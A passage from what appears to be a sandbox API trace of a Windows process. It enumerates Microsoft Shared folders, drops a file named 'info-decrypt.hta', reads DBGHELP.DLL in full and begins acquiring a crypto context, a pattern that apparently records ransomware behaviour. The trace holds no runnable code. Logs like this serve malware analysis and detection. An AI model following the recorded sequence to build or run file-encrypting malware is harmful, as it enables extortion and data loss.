lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0193.300] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0193.301] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0193.302] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0193.303] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0193.303] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0193.303] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0193.303] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0193.303] FindClose (in: hFindFile=0x77b5b0 | out: hFindFile=0x77b5b0) returned 1 [0193.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef7c) returned 1 [0193.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef88) returned 1 [0193.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef6c) returned 1 [0193.303] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x6bcea74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0193.303] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpFilePart=0x0) returned 0x32 [0193.304] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x6bcec94 | out: lpFindFileData=0x6bcec94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b130 [0193.755] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.755] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0193.755] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0193.755] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0193.756] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0193.756] FindClose (in: hFindFile=0x77b130 | out: hFindFile=0x77b130) returned 1 [0193.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef2c) returned 1 [0193.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef38) returned 1 [0193.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef6c) returned 1 [0193.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", nBufferLength=0x105, lpBuffer=0x6bcea74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpFilePart=0x0) returned 0x31 [0193.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpFilePart=0x0) returned 0x32 [0193.756] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x6bcec94 | out: lpFindFileData=0x6bcec94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b130 [0193.756] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.757] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0193.757] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0193.757] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0193.757] FindNextFileW (in: hFindFile=0x77b130, lpFindFileData=0x6bceca4 | out: lpFindFileData=0x6bceca4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0193.757] FindClose (in: hFindFile=0x77b130 | out: hFindFile=0x77b130) returned 1 [0193.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef2c) returned 1 [0193.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef38) returned 1 [0193.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0193.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bcea24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0193.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0193.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee8c) returned 1 [0193.758] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcef08 | out: lpFileInformation=0x6bcef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee88) returned 1 [0193.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bcea24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0193.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bce8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0193.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcedc0) returned 1 [0193.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x460 [0193.759] GetFileType (hFile=0x460) returned 0x1 [0193.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcedbc) returned 1 [0193.759] GetFileType (hFile=0x460) returned 0x1 [0193.759] WriteFile (in: hFile=0x460, lpBuffer=0x35b769c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6bcee84, lpOverlapped=0x0 | out: lpBuffer=0x35b769c*, lpNumberOfBytesWritten=0x6bcee84*=0x1000, lpOverlapped=0x0) returned 1 [0193.760] WriteFile (in: hFile=0x460, lpBuffer=0x35b769c*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6bcee58, lpOverlapped=0x0 | out: lpBuffer=0x35b769c*, lpNumberOfBytesWritten=0x6bcee58*=0x557, lpOverlapped=0x0) returned 1 [0193.761] CloseHandle (hObject=0x460) returned 1 [0193.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bce9a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0193.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee54) returned 1 [0193.761] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), fInfoLevelId=0x0, lpFileInformation=0x35b86b8 | out: lpFileInformation=0x35b86b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760)) returned 1 [0194.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee50) returned 1 [0194.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6bce894, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0194.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced88) returned 1 [0194.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0194.857] GetFileType (hFile=0x460) returned 0x1 [0194.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced84) returned 1 [0194.857] GetFileType (hFile=0x460) returned 0x1 [0194.857] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x6bcee90 | out: lpFileSizeHigh=0x6bcee90*=0x0) returned 0x14e760 [0194.860] ReadFile (in: hFile=0x460, lpBuffer=0x8e96c00, nNumberOfBytesToRead=0x14e760, lpNumberOfBytesRead=0x6bcee3c, lpOverlapped=0x0 | out: lpBuffer=0x8e96c00*, lpNumberOfBytesRead=0x6bcee3c*=0x14e760, lpOverlapped=0x0) returned 1 [0195.040] CloseHandle (hObject=0x460) returned 1 [0195.040] CryptAcquireContextW (in: phProv=0x6bceddc, szContainer=0x0, szProvider="Microsoft 